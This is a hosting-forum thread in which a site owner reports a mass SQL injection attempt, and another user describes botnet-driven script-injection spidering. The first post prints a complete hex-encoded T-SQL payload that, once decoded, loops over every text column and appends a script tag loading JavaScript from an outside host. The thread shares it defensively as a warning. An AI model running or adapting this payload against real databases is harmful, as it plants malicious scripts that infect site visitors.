SQL Injection Attacks

[juncmodule]

Hello,

I was attacked between 8:30AM and 8:54AM EST this morning by the following IPs:

220.232.191.66
165.21.155.10
165.21.155.16
119.234.1.28

The following is the SQL that was attempted:

Query String: ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

I have a rather complex system set up for catching malicious query strings in the URL. Currently none of my sites have active databases so I am in no real danger. I just wanted to let the community know that this is happening. The specific site that was attacked has VERY low traffic so I was shocked that it was done at all.

The code itself is harmless I believe. It points to a site that formerly contained some nasty javascript but it has been modified to point to nothing now. However, this doesn't mean that the next attack will be harmless.

Param those queries!

later,
-junc

 

[Stephen]

You are exactly right, there are 1000's (literally) of what seem to be zombie injected computers being used as someone's own "javascript infecting" spider. Pages being hit are large and small, and from the logs I see don't come from google but directly in; also doesn't seem to be scanning IP ranges like attacks/scans of old but coming direct to URLs and starting to put code in every textbox, every page it finds.

It has recently been modified such that it will infect ColdFusion databases in the same manner

Looking at the hits as you mention and how they come, and how I've seen literally dozens of times now, the IPs are many and they come too quickly to just be totally non directed spidering of the web. 1 is china and the others singapore, but I have seen quite a few Korea, Germany, few UK and US, some the planet

 

[Stephen]

Also we have some good discussions on this over in our DB section:
http://support.jodohost.com/forumdisplay.php?f=28

I am not going to move this one there because some people only come to this forum and will miss it, maybe they will see this and get the link over to the other forum.